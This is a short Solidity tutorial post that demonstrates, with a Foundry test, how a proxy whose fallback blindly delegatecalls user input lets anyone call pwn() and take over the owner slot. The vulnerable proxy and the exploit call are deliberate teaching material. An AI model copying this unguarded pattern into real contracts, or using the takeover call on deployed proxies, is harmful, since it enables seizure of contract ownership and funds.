Foundry IV — DelegateCall

Solidity Programming Language
2 min readMay 11, 2022

Source: DelegateCall Thanks to Ahmet and Murat

Delegate

contract Delegate {address public owner; function pwn() public {owner = msg.sender;}}

Proxy

contract Proxy {address public owner = address(0xdeadbeef); // slot0Delegate delegate;constructor(address _delegateAddress) public {delegate = Delegate(_delegateAddress);}fallback() external {(bool suc,) = address(delegate).delegatecall(msg.data); require(suc, "Delegatecall failed");}}

ContractTest

contract ContractTest is Test {Proxy proxy;Delegate DelegateContract;address alice;function setUp() public {alice = Makeaddr("alice");}function testDelegatecall() public {DelegateContract = new Delegate();              // logic contractproxy = new Proxy(address(DelegateContract));   // proxy contractconsole.log("Alice address", alice);console.log("DelegationContract owner", proxy.owner());// Delegatecall allows a smart contract to dynamically load code from a different address at runtime.console.log("Change DelegationContract owner to Alice...");vm.prank(alice);address(proxy).call(abi.encodeWithSignature("pwn()")); // exploit hereconsole.log("DelegationContract owner", proxy.owner());}}
DelegateContract = new Delegate();              // logic contractproxy = new Proxy(address(DelegateContract));   // proxy contract
console.log("Alice address", alice);console.log("DelegationContract owner", proxy.owner());console.log("Change DelegationContract owner to Alice...");vm.prank(alice);
address(proxy).call(abi.encodeWithSignature("pwn()")); // exploit hereconsole.log("DelegationContract owner", proxy.owner());

How?

address(proxy).call(abi.encodeWithSignature("pwn()"));

There is no pwn function in proxy contract and this falls to fallback function in proxy contract.

(bool suc,) = address(delegate).delegatecall(msg.data);

Fallback function delegatecall to delegate address with msg.data (abi.encodeWithSignature(“pwn()”))

function pwn() public {owner = msg.sender;

In the delegate contract, msg.sender will be owner also in proxy contract.

Foundry I

Foundry II

Foundry III

Foundry IV

Foundry V

Foundry VI

Associate Professor Engin YILMAZ (VeriDelisi)

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Solidity Programming Language
Solidity Programming Language

Written by Solidity Programming Language

Solidity basics for beginners: Learn the fundamentals of smart contract development and build your first DApp! #Solidity #Foundry #Ethereum #Opcodes #DApps

No responses yet

Write a response